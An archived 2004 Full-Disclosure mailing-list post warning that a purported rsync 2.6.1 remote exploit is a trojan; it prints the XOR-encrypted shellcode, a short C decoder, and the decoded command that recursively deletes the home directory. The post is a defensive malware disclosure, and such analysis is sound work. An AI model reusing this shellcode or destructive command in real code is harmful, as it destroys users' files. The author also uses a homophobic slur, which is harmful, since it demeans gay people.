Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security FullDisclosure
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[Full-Disclosure] rsynd-too-open.c posted on fd is backdoored. Don't ru

from [DownBload / Illegal Instruction Labs] Network Security [Permanent Link]
Subject: [Full-Disclosure] rsynd-too-open.c posted on fd is backdoored. Don't run it!!!
Date: Sat, 29 May 2004 15:24:09 +0200
rsync <= 2.6.1 remote exploit posted to full disclosure list is a fake and malicious exploit.
Don't run it!!!

rsynd-too-open.c:
....
void (*funct) ();
....
(long) funct = &shellcode2;
....
funct();
....

"shellcode2" is a malicious asm code that will delete your home directory.
Shellcode is encrypted with a simple XOR algorithm to obscure its main purpose.
Whoever backdoored this exploit is 100% gaydiot (mix between gay and idiot :).
I can understand people who backdoor exploits to hack machines, but placing
backdoors that will delete user home dir is evil and plain stupid.


[rot@laptop BACKDOOR]# gcc back.c
[root@laptop BACKDOOR]# ./a.out
è %    / b i n / s h  s h  - c  r m   - r f   ~ / *   2 > / d e v / n u l l


back.c
---cut here---
char shellcode2[] =
"\xeb\x10\x5e\x31\xc9\xb1\x4b\xb0\xff\x30\x06\xfe\xc8\x46\xe2\xf9"
"\xeb\x05\xe8\xeb\xff\xff\xff\x17\xdb\xfd\xfc\xfb\xd5\x9b\x91\x99"
"\xd9\x86\x9c\xf3\x81\x99\xf0\xc2\x8d\xed\x9e\x86\xca\xc4\x9a\x81"
"\xc6\x9b\xcb\xc9\xc2\xd3\xde\xf0\xba\xb8\xaa\xf4\xb4\xac\xb4\xbb"
"\xd6\x88\xe5\x13\x82\x5c\x8d\xc1\x9d\x40\x91\xc0\x99\x44\x95\xcf"
"\x95\x4c\x2f\x4a\x23\xf0\x12\x0f\xb5\x70\x3c\x32\x79\x88\x78\xf7"
"\x7b\x35";


main (int argc, char **argv)
{
       char *decrypt = shellcode2+23, key=0xff;
       int x;
       for (x=0;x<0x29;x++) {
               printf ("%c ", *decrypt ^ key);
               decrypt++;
               key--;
       }

}
---cut here---

_________________________________________________________________
Add photos to your e-mail with MSN 8. Get 2 months FREE*. http://join.msn.com/?page=features/featuredemail


[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  Re: [Full-Disclosure] Pentesting an IDP-System, Marcin Owsiany
Next by Date:  Re: [Full-Disclosure] Printer Buffer Security??, Etaoin Shrdlu
Previous by Thread:  [Full-Disclosure] Pentesting an IDP-System, ph03n1x
Next by Thread:  [Full-Disclosure] Re: rsynd-too-open.c posted on fd is backdoored. Don't run it!!!, Cory Donnelly
Indexes:  [Date] [Thread] [Top] [All Lists]